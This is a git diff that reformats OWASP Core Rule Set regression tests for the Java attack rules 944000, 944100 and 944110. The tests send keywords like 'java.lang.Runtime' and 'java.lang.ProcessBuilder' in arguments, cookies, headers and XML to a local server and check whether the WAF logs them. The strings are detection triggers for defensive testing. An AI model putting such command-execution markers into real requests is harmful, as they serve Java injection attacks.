which do not have any bodyprocessor associated - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "test=value" - output: - no_log_contains: "id \"944000\"" +meta: + author: "spartantri" + enabled: true + name: "944000.yaml" + description: "Description" +tests: + - test_title: 944000-1 + desc: Using text/plain Content-Type which do not have any bodyprocessor associated + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=value" + output: + no_log_contains: "id \"944000\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml index 65b7489343..8e0089711d 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml @@ -1,426 +1,355 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944100.yaml" - description: "Description" - tests: - - - test_title: 944100-1 - desc: Argument test includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - version: HTTP/1.0 - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-2 - desc: Argument test includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-3 - desc: Argument name includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-4 - desc: Argument name includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-5 - desc: Cookie test includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.Runtime - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-6 - desc: Cookie test includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.ProcessBuilder - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-7 - desc: Cookie name includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.Runtime=test - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-8 - desc: Cookie name includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.ProcessBuilder=test - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-9 - desc: Request header test includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.Runtime - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-10 - desc: Request header test includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.ProcessBuilder - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-11 - desc: XML element includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - - - test_title: 944100-12 - desc: XML attribute name includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - - - test_title: 944100-13 - desc: XML attribute value includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-14 - desc: XML element value includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-15 - desc: XML element includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - - - test_title: 944100-16 - desc: XML attribute name includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - - - test_title: 944100-17 - desc: XML attribute value includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-18 - desc: XML element value includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" +meta: + author: "spartantri" + enabled: true + name: "944100.yaml" + description: "Description" +tests: + - test_title: 944100-1 + desc: Argument test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_title: 944100-2 + desc: Argument test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" + - test_title: 944100-3 + desc: Argument name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944100\"" + - test_title: 944100-4 + desc: Argument name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944100\"" + - test_title: 944100-5 + desc: Cookie test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-6 + desc: Cookie test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-7 + desc: Cookie name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.Runtime=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-8 + desc: Cookie name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.ProcessBuilder=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-9 + desc: Request header test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-10 + desc: Request header test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-11 + desc: XML element includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-12 + desc: XML attribute name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-13 + desc: XML attribute value includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-14 + desc: XML element value includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_title: 944100-15 + desc: XML element includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-16 + desc: XML attribute name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-17 + desc: XML attribute value includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-18 + desc: XML element value includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml index 198c02ba2c..c7cc1360a3 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml @@ -1,426 +1,355 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944110.yaml" - description: "Description" - tests: - - - test_title: 944110-1 - desc: Argument test includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - version: HTTP/1.0 - data: "test=java.Runtime" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-2 - desc: Argument test includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "test=java.ProcessBuilder" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-3 - desc: Argument name includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "java.Runtime=test" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-4 - desc: Argument name includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "java.ProcessBuilder=test" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-5 - desc: Cookie test includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.Runtime - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-6 - desc: Cookie test includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.ProcessBuilder - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-7 - desc: Cookie name includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.Runtime=test - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-8 - desc: Cookie name includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.ProcessBuilder=test - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-9 - desc: Request header test includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.Runtime - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-10 - desc: Request header test includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.ProcessBuilder - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-11 - desc: XML element includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - - - test_title: 944110-12 - desc: XML attribute name includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 